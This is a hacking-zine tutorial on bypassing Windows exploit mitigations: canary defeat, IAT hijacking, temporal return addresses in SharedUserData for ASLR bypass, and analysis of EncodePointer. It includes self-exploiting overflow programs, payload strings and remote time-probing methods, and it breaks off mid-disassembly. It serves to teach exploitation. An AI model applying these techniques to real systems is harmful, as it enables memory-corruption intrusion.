[==============================================================================]
[-------[ Beating some counter-exploitation measures on WinNT+ systems ]-------]
[==============================================================================]
_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>'<######
*#########( )####*
##########>.<##### author: Nomenumbra/[0x00SEC]
################ remember: http://www.bash.org/?753599
*############*
"T######T"
--[ 0x00 ]--------------------------------------------[ Table Of Contents ]-----
[ 0x00 ] Table Of Contents
[ 0x01 ] Intro
[ 0x02 ] IAT overwriting
[ 0x03 ] Beating ASLR through global static values and .idata disclosure
[ 0x04 ] A look at the M$ Pointer hijacking protection api
[ 0x05 ] Greetings 'n shoutz
--[ 0x01 ]--------------------------------------------------------[ Intro ]-----
Welcome, ladies and gentlemen, to this article - aimed at laying out a few
relatively fresh (and some new) concepts and techniques for exploiting WinNT+
systems armed with counter-exploitation techniques. Sure, there are more areas
to cover concerning this topic, but those have been dealt with, over and over
again, whilst most of the stuff in this paper is either scarcely documented or
new. I hope you'll enjoy your read.
--[ 0x02 ]----------------------------------------------[ IAT overwriting ]-----
The following program is a simple demonstration of how canary values work:
------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    unsigned char canary;         // canary value
    char buffer[256];
    char buffer2[289];

    canary = 0xAB;                // assign value
    memset(buffer,0x00,256);      // zero out the memory
    // construct evil buffer
    memset(buffer2,0x90,271);     // 256+12+3 (12+3 bytes is mingw compiler
                                  // specific junk on my test box so it seemed)
    memset(buffer2+271,0xAB,1);   // canary
    memset(buffer2+272,0x90,12);  // +12 bytes to EIP
    memset(buffer2+284,0xFF,4);   // eip
    buffer2[288] = 0x00;          // terminate the string for strcpy
    strcpy(buffer,buffer2);
    if(canary != 0xAB)
    {
        printf("Canary corruption!\n");
        exit(0);
    }
    printf("You made it!\n");
    return 0;
}
------------------------------------------------------------------------[/SNIP]-
This is a pretty casual overflow with strcpy(0022FE60,buffer2);
0022FE60 == start of dest buffer
0022FF6F == canary location
If we take a look at what is between the end of the buffer (0022FF60) and the
canary location (0022FF6F), we get the following dump:
0022FF60 AD AE C0 77 38 07 91 7C ®Àw8‘|
0022FF68 FF FF FF FF A8 FF 22 ÿÿÿÿ¨ÿ"
Now, 0x77C0AEAD is a memory address in msvcrt.dll and 0x7C910738 is a memory
address in ntdll.dll - but they reference nothing in particular, so my guess is
this is just mingw-specific junk, which we'll ignore. The main point is: Dealing
with static canaries is trivial, as demonstrated above. But what if we used a
randomized canary? Let's look at a slightly modified example:
------------------------------------------------------------------------[SNIP]--
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    unsigned char saved_canary;
    unsigned char canary;
    char buffer[256];
    char buffer2[289];

    srand(GetTickCount());
    saved_canary = (unsigned char)(rand()%0xFF);
    canary = saved_canary;
    memset(buffer,0x00,256);
    memset(buffer2,0x90,270);     // 256+12+2
    memset(buffer2+270,0xAB,1);   // canary
    memset(buffer2+271,0xAB,1);   // saved_canary
    memset(buffer2+272,0x90,12);  // space in between
    memset(buffer2+284,0xFF,4);   // eip
    buffer2[288] = 0x00;          // terminate the string for strcpy
    strcpy(buffer,buffer2);
    if(canary != saved_canary)
    {
        printf("Canary corruption!\n");
        exit(0);
    }
    printf("You made it!\n");
    return 0;
}
------------------------------------------------------------------------[/SNIP]-
As we can see, the canary value is compared to a saved_canary value, which makes
this implementation downright stupid: The saved_canary can trivially be
overwritten as well. Now what if we localize the saved_canary value somewhere
else? Like this for example?
------------------------------------------------------------------------[SNIP]--
unsigned char saved_canary;
int main(int argc, char *argv[])
{
unsigned char canary;
char buffer[256];
/* ... */
------------------------------------------------------------------------[/SNIP]-
Well, this can be solved by overwriting with a really long buffer:
buffer address = 0x0022FE60
saved_canary address = 0x00404060
diff = 0x1D4200
Hence, buffer+diff = saved_canary. Note that this only works when all memory in
between is writable. However, memory isn't always writable, and a static NULL
byte canary might be used.
In these situations, on Linux platforms, we can help ourselves with GOT
overwriting. For those unfamiliar with the attack, I'll give a short example.
Imagine the following app:
char* ptr = NULL;
char array[10];
ptr = array;
strcpy(ptr,argv[1]);
printf("test one two three...\n");
strcpy(ptr,argv[2]);
printf("%s\n",ptr);
The basic idea is that we are somehow unable to overflow EIP (either by stack
protection or otherwise) and must overwrite the ptr value with a value of our
choice. Now, if we look closely at the example we can see that the first strcpy
can overflow array. If we overflow array and modify ptr with it, we can control
the destination address of the second strcpy, yielding an arbitrary write.
The Global Offset Table (GOT) redirects position independent address
calculations to an absolute location and is located in the .got section of an
ELF executable or shared object. To quote c0ntex on this:
"It stores the final (absolute) location of a function calls symbol, used in
dynamically linked code. When a program requests to use printf() for instance,
after the rtld locates the symbol, the location is then relocated in the GOT and
allows for the executable via the Procedure Linkage Table, to directly access
the symbols location."
Printf would look something like this:
Location 1: call 0x80482b0 <printf> (PLT)
Location 2: jmp *0x8049550 (GOT)
Where location 2 is the GOT table entry.
If we manage to overwrite ptr with printf()'s GOT entry addr, we can modify the
entry and redirect execution of the following printf() to any address we want,
for example the libc function system() and then supply the name of a suid shell
as an argument.
Now, on Linux this is a pretty well-known technique, but that isn't the case for
its Windows equivalent. In fact, I haven't seen it being documented anywhere.
The PE file format equivalent of the GOT is the Import Address Table (IAT). The
IAT is used as a lookup table when the application is calling a Windows API
function. Because a compiled PE DLL/EXE cannot know in advance where the other
DLLs it depends upon are located in memory, an indirect jump is required. As the
dynamic linker loads modules and joins them together, it writes the actual
addresses of the destination functions into the IAT slots.
If we look at the disassembly of a simple application utilizing printf we
can see the following:
00401376 |. E8 45050000 CALL <JMP.&msvcrt.printf> ; \printf
Now, if we take a look at the destination of this call:
004018C0 $-FF25 04514000 JMP DWORD PTR DS:[<&msvcrt.printf>] ; msvcrt.printf
004018C6 90 NOP
004018C7 90 NOP
004018C8 00 DB 00
004018C9 00 DB 00
004018CA 00 DB 00
004018CB 00 DB 00
004018CC 00 DB 00
004018CD 00 DB 00
004018CE 00 DB 00
004018CF 00 DB 00
004018D0 $-FF25 0C514000 JMP DWORD PTR DS:[<&msvcrt.strcpy>] ; msvcrt.strcpy
As you can see, in this table we create a jump to the address stored at
0x00405104 (the operand bytes 04 51 40 00 are little-endian). So the DWORD
located at 0x00405104 is taken and that DWORD is treated as an address to which
we jump, the address of the printf function prologue in msvcrt.dll. I will now
present an example demonstrating IAT hijacking.
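As a quick aside on reading such a stub: the six bytes FF 25 xx xx xx xx encode
JMP DWORD PTR [imm32], and the four operand bytes are the little-endian address
of the IAT slot. The following is only a minimal sketch of pulling that slot
address out of a stub; the function names are made up for illustration and are
not part of any Windows API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a 32-bit little-endian value from a byte buffer. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * If 'stub' starts with FF 25 (JMP DWORD PTR [imm32]), store the absolute
 * address of the referenced slot in *slot and return 1; otherwise return 0.
 * (Hypothetical helper, for illustration only.)
 */
int iat_slot_from_stub(const unsigned char *stub, size_t len, uint32_t *slot)
{
    assert(stub != NULL && slot != NULL);
    if (len < 6 || stub[0] != 0xFF || stub[1] != 0x25)
        return 0;
    *slot = read_le32(stub + 2);
    return 1;
}
```

Fed with the printf stub bytes from the disassembly above (FF 25 04 51 40 00),
the helper yields 0x00405104, which is the value the exploit below writes as
"\x04\x51\x40\x00".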
This is a self-exploiting vulnerable app:
------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DIFF 28
// 0x7C81CDDA: ExitProcess kernel32.dll address
#define BUF2 "\xDA\xCD\x81\x7C"

char buffer[500];

int main(int argc, char **argv)
{
    char* pointer = NULL;
    char array[10];

    memset(buffer,0,500);
    memset(buffer,0x90,DIFF);
    strcpy(buffer+DIFF,"\x04\x51\x40\x00"); // printf IAT entry
    pointer = array;
    strcpy(pointer, buffer); // argv[1]
    printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
    strcpy(pointer, BUF2);
    printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
    return 0;
}
------------------------------------------------------------------------[/SNIP]-
As you can see, we overflow array by filling it with NOP bytes and overwriting
char* pointer with the address of the printf IAT entry (0x00405104). Once it's
overwritten, the second strcpy operation will copy the address of the
ExitProcess function located in kernel32.dll to the IAT slot of printf,
redirecting the next printf() call to ExitProcess. This technique is pretty
powerful, since it allows us to beat both non-executable stacks and canary
protection. Let me demonstrate this:
------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// still 28, remember the mingw-specific compiler junk?
#define DIFF 28
#define BUF2 "\xDA\xCD\x81\x7C"
//0x7c81cdda exitprocess kernel32.dll address

unsigned char saved_canary;
char buffer[500];

void SomePrivilegedFunction() { }

int main(int argc, char **argv)
{
    char* pointer = NULL; // array + 28
    unsigned char canary; // array + 27
    char array[10];

    saved_canary = (unsigned char)(rand()%0xFF);
    canary = saved_canary;
    memset(buffer,0,500);
    memset(buffer,0x90,DIFF);
    strcpy(buffer+DIFF,"\xF8\x50\x40\x00"); // exit() IAT entry
    pointer = array;
    strcpy(pointer, buffer); // argv[1]
    printf("[%s]\n",pointer);
    strcpy(pointer, BUF2);
    if(canary != saved_canary)
    {
        exit(0);
    }
    else
        printf("[%s]\n",pointer);
    return 0;
}
------------------------------------------------------------------------[/SNIP]-
This app, a modification of the previously shown app, is self-exploiting, too.
Only this time, there is a canary value introduced and we will exit() if it
doesn't match. The solution is obvious, we overwrite exit()'s IAT entry. But
since we don't control the arguments, what good can come from overwriting it
like this? Let us see:
00401387 |. 3A05 60404000 CMP AL,BYTE PTR DS:[404060] ; |
0040138D |. 74 0C JE SHORT iathijac.0040139B ; |
0040138F |. C70424 0000000>MOV DWORD PTR SS:[ESP],0 ; |
00401396 |. E8 55050000 CALL <JMP.&msvcrt.exit> ; \exit
0040139B |> 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] ; |
As we can see, the comparison located at 0x00401387 is followed by a conditional
jump to either the function exit or continuation of code execution flow at
0x0040139B.
So if we overwrite exit()'s IAT entry with, for example, the address of
SomePrivilegedFunction, we still fully control code execution flow. Hell, we can
supply the address of our buffer as well, potentially making it execute
shellcode (that is, on systems with an executable stack, else we'll have to
resort to pure api call replacement or code flow redirection). Also note that
this technique might be of use in combination with other attacks.
For example, when we cannot redirect code flow or supply a useful API for
overwriting, we can still manipulate the program into unauthorized behavior in
another way, for example by overwriting the IAT entry of the exit() call, when
we know that this call is made after supplying a wrong password. We can then
overwrite the entry with the address of the code branch which is normally taken
upon a successful password check, elevating our privileges. Note that these
write-anything-anywhere situations might seem rare, but are far more common in
format-string exploits.
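To make the idea concrete without touching a real PE image, here is a toy model
in portable C. It is only a sketch under loud assumptions: the "IAT" is a plain
array of function pointers, the write-anything-anywhere primitive is a memcpy,
and every name in it (toy_iat, deny_access, grant_access, ...) is invented for
the illustration.

```c
#include <assert.h>
#include <string.h>

typedef int (*slot_fn)(void);

int deny_access(void)  { return 0; }  /* stands in for the exit() path      */
int grant_access(void) { return 1; }  /* stands in for the success branch   */

/* Toy "import table": callers always go through the slot, never directly. */
slot_fn toy_iat[1] = { deny_access };

/* Write-anything-anywhere primitive, modelled as a plain memcpy. */
void write_what_where(void *where, const void *what, size_t n)
{
    assert(where != NULL && what != NULL);
    memcpy(where, what, n);
}

/* The "program": an indirect call through the table slot. */
int check_password(void)
{
    return toy_iat[0]();
}
```

Before the write, check_password() lands in deny_access(); after overwriting
toy_iat[0] with the address of grant_access, the very same call site ends up in
the "privileged" branch, and nothing on the stack was touched to get there.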
--[ 0x03 ]--------------------------[ Beating ASLR through global ]-----
[ static values and .idata disclosure ]
A recurring issue when it comes to reliable exploitation is that of finding a
decent return address. Usually we use an opcode configuration located in a
loaded module or (in some rare cases) located in the mapped executable memory
itself. However, when ASLR is involved, things tend to get a bit tricky, and if
we don't want to rely on prediction or bruteforce, we'll have to find another
way to locate a decent return address. Now, on Linux systems, there is the old
linux-gate.so.1 technique. To quote izik's paper:
"'Linux-gate.so.1' is a dynamically shared object (DSO). It's life purpose is to
speed up and support system calls and signal/sigreturn for the kernel within the
user application. In particular it helps out handling a situation where a system
call accepts six parameters. This is when the EBP register has to be overwritten
and serve as the 6th parameter to the system call. Notice that this ties the
usage and need of linux-gate.so.1 to only linux kernels that are running under
ia32 and ia32-64 architectures."
Due to its nature, linux-gate.so.1 is always located at address 0xffffe000, so
we can search from 0xffffe000 to 0xffffeFFF for the desired opcode bytes to get
reliable return addresses.
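Searching a statically mapped page for opcode bytes boils down to a byte-pattern
scan. The sketch below works on an ordinary buffer (how you get a copy of the
page is up to you); find_opcode is a name chosen for this example only.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Return the offset of the first occurrence of 'pat' inside 'mem',
 * or -1 if the pattern does not occur.
 */
long find_opcode(const unsigned char *mem, size_t mem_len,
                 const unsigned char *pat, size_t pat_len)
{
    size_t i;

    assert(mem != NULL && pat != NULL);
    if (pat_len == 0 || pat_len > mem_len)
        return -1;
    for (i = 0; i + pat_len <= mem_len; i++) {
        if (memcmp(mem + i, pat, pat_len) == 0)
            return (long)i;
    }
    return -1;
}
```

Adding the returned offset to the base of the scanned region (0xffffe000 in the
linux-gate case) gives a candidate return address for, say, the FF E4 (jmp esp)
pattern.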
On Windows, however, there is no such thing as linux-gate.so.1, so we must look
for other statically located memory areas. Now let us consider timers and
counters: if we manage to find a timer or counter variable in memory, given its
range is big enough, we know that at a given time this counter/timer will
contain our opcode configuration (say we're looking for a jmp esp, which is
0xFFE4). Now, for using this technique in a reliable exploit we must know:
0) The interval of the timer/counter
1) The starting value of the timer/counter
2) The range of the timer/counter
3) The (static) address of the timer/counter
So say we have a given timer counting from a given date - January the 1st, 1970,
say. This timer has an interval of 1 second and a size of 4 bytes. Determining
the interval can be done in a number of ways, unless one already has knowledge
of the usage of said timer. One such method might be Skape's Telescope program
discussed in his "Temporal Return Addresses" article for Uninformed. Now, if we
are on the same machine, exploiting a local vulnerability, determining local
time is trivial, but what to do when we are attacking a remote machine?
There are several techniques we can use to determine remote system time.
0) Using NetRemoteTOD in combination with NULL sessions.
It is possible to use a standard Windows API for determining the remote time.
Doing so requires establishing a NULL session first. For those unfamiliar
with the concept: http://rusecure.rutgers.edu/add_sec_meas/nullssn.php
A small C example of code establishing a connection:
NETRESOURCE nr;
nr.lpRemoteName = "\\\\server\\resource";
nr.dwType = RESOURCETYPE_DISK;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
WNetAddConnection2(&nr,(LPSTR) szPassWord,(LPSTR) szUserName,0);
Now fetching the remote time goes as follows:
WCHAR wszNetbios[200];
TIME_OF_DAY_INFO *tinfo=NULL;
// convert string
mbstowcs(wszNetbios, szServer, 200);
// return server time of day
NetRemoteTOD(wszNetbios,(LPBYTE *)&tinfo);
As you can see, the TIME_OF_DAY_INFO structure provides plenty of information
for us to deal with: http://msdn2.microsoft.com/en-us/library/aa370959.aspx
1) ICMP TIMESTAMP
We can use the ICMP TIMESTAMP request to obtain the number of milliseconds
since midnight UT. If we can obtain the timezone we can obtain the exact
remote time. Obtaining the timezone can be done by performing an IP WHOIS
lookup for example.
2) HTTP Server Date Header
If a HTTPd is running on the target machine, we can potentially fetch the
remote date from the HTTP header.
3) IP Timestamps Option
Just like the ICMP TIMESTAMP request, IP also has a timestamp option that
measures the number of milliseconds since midnight UT.
Now let us look at a special memory region found in all processes on Windows
NT+. This memory region, known as NTSharedUserData is always located at the same
static address, namely 0x7ffe0000. The structure looks like this on WinXP SP2:
+0x000 TickCountLow : Uint4B
+0x004 TickCountMultiplier : Uint4B
+0x008 InterruptTime : _KSYSTEM_TIME
+0x014 SystemTime : _KSYSTEM_TIME
+0x020 TimeZoneBias : _KSYSTEM_TIME
+0x02c ImageNumberLow : Uint2B
+0x02e ImageNumberHigh : Uint2B
+0x030 NtSystemRoot : [260] Uint2B
+0x238 MaxStackTraceDepth : Uint4B
+0x23c CryptoExponent : Uint4B
+0x240 TimeZoneId : Uint4B
+0x244 Reserved2 : [8] Uint4B
+0x264 NtProductType : _NT_PRODUCT_TYPE
+0x268 ProductTypeIsValid : UChar
+0x26c NtMajorVersion : Uint4B
+0x270 NtMinorVersion : Uint4B
+0x274 ProcessorFeatures : [64] UChar
+0x2b4 Reserved1 : Uint4B
+0x2b8 Reserved3 : Uint4B
+0x2bc TimeSlip : Uint4B
+0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
+0x2c8 SystemExpirationDate : _LARGE_INTEGER
+0x2d0 SuiteMask : Uint4B
+0x2d4 KdDebuggerEnabled : UChar
+0x2d5 NXSupportPolicy : UChar
+0x2d8 ActiveConsoleId : Uint4B
+0x2dc DismountCount : Uint4B
+0x2e0 ComPlusPackage : Uint4B
+0x2e4 LastSystemRITEventTickCount : Uint4B
+0x2e8 NumberOfPhysicalPages : Uint4B
+0x2ec SafeBootMode : UChar
+0x2f0 TraceLogging : Uint4B
+0x2f8 TestRetInstruction : Uint8B
+0x300 SystemCall : Uint4B
+0x304 SystemCallReturn : Uint4B
+0x308 SystemCallPad : [3] Uint8B
+0x320 TickCount : _KSYSTEM_TIME
+0x320 TickCountQuad : Uint8B
+0x330 Cookie : Uint4B
One of the purposes of SharedUserData is to provide processes with a global and
consistent method of obtaining certain information that may be requested
frequently. The reason why it's located at a static address is a design issue.
Prior to Windows XP, system calls were dispatched through the soft-interrupt
0x2E. From XP SP0 on however, they designed a way to support processor-specific
instructions for system calls, such as sysenter or syscall. To support this,
Microsoft added fields to the NtSharedUserData structure, namely the SystemCall
related fields. If we take a look at the disassembly of the data located at
NtSharedUserData.SystemCall on XP SP0 systems:
7ffe0300 8bd4 mov edx,esp
7ffe0302 0f34 sysenter
7ffe0304 c3 ret
Those familiar with Windows system calls will immediately recognize this as the
m$ way of calling NT syscalls. This is why all syscalls performed by Windows
APIs reference NtSharedUserData.SystemCall:
mov edx,0x7ffe0300
call edx
Because SharedUserData contained executable instructions, the SharedUserData
mapping had to be marked as executable. However, starting from XP SP2 and 2003
SP1 they realized that this might pose a security risk (O RLY?). So instead of
positioning executable instructions there, they replaced them with pointers, as
seen on XP SP2 systems:
+0x300 SystemCall : 0x7c90eb8b
+0x304 SystemCallReturn : 0x7c90eb94
So all syscall stubs were changed like this:
mov edx,0x7ffe0300
call dword ptr [edx]
The address referenced by NtSharedUserData.SystemCall is the address of
ntdll.KiFastSystemCall, which is the same code stub previously located at
NtSharedUserData.SystemCall. Now all WinNT+ systems prior to XP SP2 and win2k3
SP1 have an executable SharedUserData, which makes it perfectly suited as a
static return address location. As we discussed earlier, we can use timer
variables as a return address location, and SharedUserData has three of them:
+0x000 TickCountLow : Uint4B
+0x008 InterruptTime : _KSYSTEM_TIME
+0x014 SystemTime : _KSYSTEM_TIME
Now, let us look at them with our prerequisites for a good temporal return
address in mind. Let us first look at TickCountLow. TickCountLow is used, in
combination with TickCountMultiplier to calculate the number of milliseconds
since boot like this:
MilliSeconds = TickCountLow * TickCountMultiplier >> 24
Because the initial value is unknown to us, and the update interval may vary
among different hardware architectures, this value is quite unreliable. We can
however, use the TCP timestamping technique to determine the current value and
interval.
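The TickCountLow formula is easy to get wrong in C because the 32x32-bit product
overflows a 32-bit integer. A small sketch (function names are mine; the
multiplier 0x0FA00000 used in the note below is only an assumed example value,
corresponding to a 15.625 ms tick):

```c
#include <assert.h>
#include <stdint.h>

/* MilliSeconds = TickCountLow * TickCountMultiplier >> 24 */
uint32_t ticks_to_ms(uint32_t tick_count_low, uint32_t tick_count_multiplier)
{
    /* Widen first: the product does not fit in 32 bits. */
    uint64_t product = (uint64_t)tick_count_low * tick_count_multiplier;
    return (uint32_t)(product >> 24);
}

/*
 * Inverse direction: given an estimated uptime in milliseconds, predict
 * (rounding down) the TickCountLow value the target holds.
 */
uint32_t ms_to_ticks(uint32_t ms, uint32_t tick_count_multiplier)
{
    assert(tick_count_multiplier != 0);
    return (uint32_t)(((uint64_t)ms << 24) / tick_count_multiplier);
}
```

With the assumed multiplier 0x0FA00000, 64 ticks map to 1000 ms and back, so an
uptime estimate obtained remotely translates directly into a predicted
TickCountLow.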
The InterruptTime value stores a 100 nanosecond counter counting the amount of
time spent processing system interrupts. Due to its unpredictable nature, both
regarding interval and initial value, this variable is virtually unusable.
The SystemTime value is a 100 nanosecond counter measured from Jan. 1, 1601.
This time is relative to the timezone the target machine is using. So if we
obtain that information, we can use the SystemTime value as a very useful
temporal return address.
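Since most remote time sources hand us Unix-style seconds, we need to convert
them into 100 nanosecond units since 1601 before we can reason about the bytes
in SystemTime. A minimal sketch, assuming the remote time is already available
as seconds since Jan. 1, 1970 (function names are illustrative only):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Seconds between 1601-01-01 and 1970-01-01 (both 00:00:00). */
#define EPOCH_DIFF_SECS 11644473600ULL

/* Convert seconds since 1970 into 100 ns units since 1601. */
uint64_t unix_to_100ns_1601(uint64_t unix_secs)
{
    return (unix_secs + EPOCH_DIFF_SECS) * 10000000ULL;
}

/* Split the 64-bit value into the low and high DWORDs as laid out in memory. */
void split_time(uint64_t t, uint32_t *low, uint32_t *high)
{
    assert(low != NULL && high != NULL);
    *low  = (uint32_t)(t & 0xFFFFFFFFu);
    *high = (uint32_t)(t >> 32);
}
```

The high DWORD changes only about every 429.5 seconds (2^32 * 100 ns), which
makes it the more stable half to aim for.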
Now, the last step is to calculate the exact point of time when the target
variable will contain a valuable opcode. Let us consider a 32 bit double word
initialized with 0x00000000 at a given time, being continually incremented by Z
at an interval of X. Now, there are plenty of useful opcodes, including jmp/call
esp, pop/pop/ret for SEH overwrites, and so forth. Let's consider a trivial jmp
esp, which is 0xFFE4. Also let our target variable be located at address Y,
giving us 5 opcode occurrences during a full loop:
1) 0xFFE4<UUUU>
2) 0x<U>FFE4<UUU>
3) 0x<UU>FFE4<UU>
4) 0x<UUU>FFE4<U>
5) 0x<UUUU>FFE4
where U is any byte. The first time, 0xFFE4<UUUU> is reached after a time of
((0xFFE40000 * X)/Z) and lasts for
(((0xFFE50000-0xFFE40000-1)*X)/Z) = ((0xFFFF * X)/Z).
Given this technique, we can calculate the exact time and time window of valid
opcode occurrences.
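The two formulas above translate into a few lines of C. This is a sketch under
the same assumptions as the text (counter starts at 0, gains Z every X time
units); the function names are mine, and X can be in any unit as long as the
product fits in 64 bits. Keep in mind that x86 stores DWORDs little-endian, so
the byte order seen in memory is the reverse of the value as written here.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Time after which a counter that starts at 0 and gains 'z' every 'x'
 * time units first reaches 'value': (value * X) / Z.
 */
uint64_t time_to_reach(uint32_t value, uint64_t x, uint64_t z)
{
    assert(z != 0);
    return ((uint64_t)value * x) / z;
}

/*
 * How long a 16-bit pattern stays in the upper half of the DWORD while
 * the lower 16 bits run through their range: (0xFFFF * X) / Z.
 */
uint64_t window_length(uint64_t x, uint64_t z)
{
    assert(z != 0);
    return (0xFFFFULL * x) / z;
}
```

For a counter that gains 1 every second, time_to_reach(0xFFE40000, 1, 1) is
0xFFE40000 seconds and the window stays open for 0xFFFF seconds, a bit over 18
hours.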
Another interesting trick becomes applicable when exploiting a format string bug
yielding a read-anything from anywhere situation. Since .idata includes the
import directory as well as the import address name table and is statically
located, we can deduce the address of any given function. For every imported
module there is a special structure in the .idata section (as worked out by
Caolan McNamara):
typedef struct tagImportDirectory
{
    DWORD dwRVAFunctionNameList;
    DWORD dwUseless1;
    DWORD dwUseless2;
    DWORD dwRVAModuleName;
    DWORD dwRVAFunctionAddressList;
} IMAGE_IMPORT_MODULE_DIRECTORY,
  *PIMAGE_IMPORT_MODULE_DIRECTORY;
Each one of these entries points to information for the given imported module.
dwRVAFunctionNameList is a relative virtual address that points to a list of
RVAs, each pointing to the null-terminated string of an imported function name.
The dwUseless DWORDS are simply padding area. dwRVAModuleName is a relative
virtual address that points to the module name.
dwRVAFunctionAddressList is a RVA pointing to a list of RVAs that will be loaded
upon PE loading time. This list contains the addresses of the loaded functions.
Now, by using a read-anything-from-anywhere situation, we can read from this
statically located dwRVAFunctionAddressList to deduce the address of an imported
function. If we then subtract the correct offset, which isn't randomized, we
can obtain the base address for the given randomized module and beat ASLR in
this fashion.
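The arithmetic behind this is plain subtraction. In the sketch below the leaked
bytes and the function offset are purely hypothetical example values (they do
not come from a real msvcrt.dll), and the helper names are invented for the
illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Interpret four leaked bytes as a little-endian 32-bit address. */
uint32_t leaked_to_addr(const unsigned char leak[4])
{
    return (uint32_t)leak[0] | ((uint32_t)leak[1] << 8) |
           ((uint32_t)leak[2] << 16) | ((uint32_t)leak[3] << 24);
}

/* Module base = leaked function address - function offset inside the module. */
uint32_t module_base(uint32_t leaked_func_addr, uint32_t func_offset)
{
    assert(leaked_func_addr >= func_offset);
    return leaked_func_addr - func_offset;
}

/* Once the base is known, any other offset in that module can be rebased. */
uint32_t rebase(uint32_t base, uint32_t offset)
{
    return base + offset;
}
```

With a hypothetical leak of 6A 18 C4 77 and a known offset of 0x4186A, the
module base comes out as 0x77C00000, and every gadget or function offset in that
module can then be rebased from it.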
--[ 0x04 ]------------[ A look at the M$ Pointer hijacking protection API ]-----
Somewhere in 2006, Michael Howard blogged about Microsoft's EncodePointer /
EncodeSystemPointer APIs which were designed to make pointer hijacking more
difficult. Now, for those who don't know what pointer hijacking is, it's
actually pretty simple. Consider a vulnerable function:
------------------------------------------------------------------------[SNIP]--
int VulnFunc(char *szString) {
    DWORD fp;
    char buf[32];

    fp = (DWORD)&SomeFunc;
#ifdef DEBUG
    printf("[*] fp == 0x%04x\n",fp);
#endif
    strcpy(buf,szString); // overflows buf into fp
#ifdef DEBUG
    printf("[*] fp == 0x%04x\n",fp);
#endif
    if (fp)
        (*(void (*)(void)) fp)();
    return 0;
}
------------------------------------------------------------------------[/SNIP]-
Now, this simple stack overflow would usually be exploited by casually
overwriting EIP. But what if, for some reason, we can't supply a big enough
string (szString is too small for example)? Well, in that case we could
overwrite the fp pointer and gain control of code execution flow that way, upon
execution of (*(void (*)(void)) fp)(). Example:
When running the function using szString = "test" we get the following output:
[*] fp == 0x401290
[*] fp == 0x401290
When supplying a buffer of "\x90"x44,"\x41"x4 we get the following output:
[*] fp == 0x401290
[*] fp == 0x41414141
Now, starting from Windows XP SP2 and Windows Server 2003 SP1, M$ supplies us
with the EncodePointer / DecodePointer and EncodeSystemPointer APIs. These
functions encode the pointer and decode it before usage, adding a layer of
security when using long-lived pointers. A small example:
------------------------------------------------------------------------[SNIP]--
int Functionlol(char *szString) {
    DWORD fp;
    DWORD fp2;
    char buf[32];

    fp = (DWORD)&SomeFunc;
    fp2 = 0xCAFEBABE;
#ifdef DEBUG
    printf("[*]Before encoding of fp:\n");
    printf("[*] fp == 0x%04x\n",fp);
    printf("[*] fp2 == 0x%04x\n",fp2);
#endif
    fp = (DWORD)(*(PVOID (*)(PVOID)) EncodePointer)(&SomeFunc);
#ifdef DEBUG
    printf("[*]After encoding of fp and before b0f:\n");
    printf("[*] fp == 0x%04x\n",fp);
    printf("[*] fp2 == 0x%04x\n",fp2);
#endif
    strcpy(buf,szString);
#ifdef DEBUG
    printf(
    "[*]After encoding of fp and after b0f, before decoding of fp to fp2:\n");
    printf("[*] fp == 0x%04x\n",fp);
    printf("[*] fp2 == 0x%04x\n",fp2);
#endif
    fp2 = (DWORD)(*(PVOID (*)(PVOID)) DecodePointer)((void*)fp);
#ifdef DEBUG
    printf("[*]After decoding of fp to fp2:\n");
    printf("[*] fp == 0x%04x\n",fp);
    printf("[*] fp2 == 0x%04x\n",fp2);
#endif
    if (fp2)
        (*(void (*)(void)) fp2)();
    return 0;
}
------------------------------------------------------------------------[/SNIP]-
Note that I loaded EncodePointer and DecodePointer directly from kernel32.dll
using GetProcAddress. Let us see how this works out:
When setting szString = "test"
[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0x401290
As we can see, fp gets neatly encoded and eventually decoded to fp2.
Now, when attempting a buffer overflow attack:
[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x90909090
[*]After decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x88119145
As we can see, fp gets encoded and eventually overwritten with 0x41414141. The
problem lies in the fact that this value gets decoded to fp2, resulting in a
false address. EncodeSystemPointer / DecodeSystemPointer work in exactly the
same manner, with one major difference. EncodePointer uses a per-process
randomized value, whilst EncodeSystemPointer uses a system-wide unique value.
Interesting ... but how do these functions work exactly?
Let us first look at EncodeSystemPointer, since this function is the least
secure. On my box the kernel32.dll export is forwarded to ntdll.dll, where the
code is located at 0x7C91AFC8 and disassembles to:
7C91AFC8 > 8BFF MOV EDI,EDI
7C91AFCA 55 PUSH EBP
7C91AFCB 8BEC MOV EBP,ESP
7C91AFCD A1 3003FE7F MOV EAX,DWORD PTR DS:[7FFE0330]
7C91AFD2 3345 08 XOR EAX,DWORD PTR SS:[EBP+8]
